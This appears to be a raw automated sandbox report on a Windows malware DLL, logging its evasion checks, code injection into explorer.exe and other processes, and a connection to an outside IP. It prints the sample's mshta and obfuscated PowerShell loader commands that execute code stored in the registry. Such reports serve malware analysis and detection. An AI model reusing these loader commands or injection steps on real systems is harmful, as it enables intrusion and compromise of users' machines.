                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6738Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2116Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_00B5591B
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: mshta.exe, 00000011.00000002.618351253.0000026BC911C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\a
                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 0000001F.00000000.759539039.0000013857059000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001A.00000000.711762241.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000011.00000002.618351253.0000026BC911C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001A.00000000.687252033.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B55A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_00B55A14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_00B5FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_00B5CE21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00B5A513
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_00B5BE55

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: D60000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2BC0000 protect: page execute and read and writeJump to behavior
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 73801580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 73801580Jump to behavior
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 73801580
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7500B12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: D60000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7500B12E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: D60000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2BD0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: D54000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2BC0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F84004000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA73801580 protect: page execute read
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 684 base: D60000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 684 base: 7FFA73801580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 684 base: 2BD0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: D54000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 2BC0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: 40Jump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 5304Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 684Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 684Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
                      Source: explorer.exe, 0000001A.00000000.672758335.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.725238874.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.715341712.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048912D3 cpuid 2_2_048912D3
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
